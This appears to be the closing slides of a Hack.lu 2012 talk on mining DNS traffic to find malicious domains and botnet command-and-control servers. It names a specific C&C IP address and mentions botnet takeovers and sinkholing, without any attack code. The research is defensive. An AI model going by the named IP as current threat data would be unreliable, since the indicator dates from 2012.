![Page 73: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/73.jpg)
74
Sample analysis
● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filering (IP, WHOIS information)
![Page 74: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/74.jpg)
75
Sample analysis
● So we have C&C IP 66.175.210.173● we can continue mining to see if we get any
other domain names:
![Page 75: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/75.jpg)
76
IP → domain transform
![Page 76: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/76.jpg)
77
Automation
![Page 77: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/77.jpg)
78
Performance
● On single machine (32Gb RAM) we run up to 2000 pkt/sec without significant performance loss
● Average load:
![Page 78: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/78.jpg)
79
Other Interesting numbers
● Packets per day: ~130M filtered.● Mal. Domains/day: ~30k DNS queries (varies)● Avg. 30-50 req/minute for single domain●
![Page 79: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/79.jpg)
80
Uses of the data
● Obvious: blacklists● Botnet take overs (costs 11USD or less ;)● Sinkholing
![Page 80: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/80.jpg)
81
Demotime :)
● (demos, lets look at some videos :)
![Page 81: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/81.jpg)
82
Questions?
@fygrave@vbkropotov
![Page 82: Hacklu2012 v07](https://reader035.fdocuments.net/reader035/viewer/2022081716/54c68f7f4a795962378b4699/html5/thumbnails/82.jpg)
83
Feedback:@fygrave
@vbkropotov(also @ gmail.com)
Code:
https://github.com/fygrave/dnslyzer.git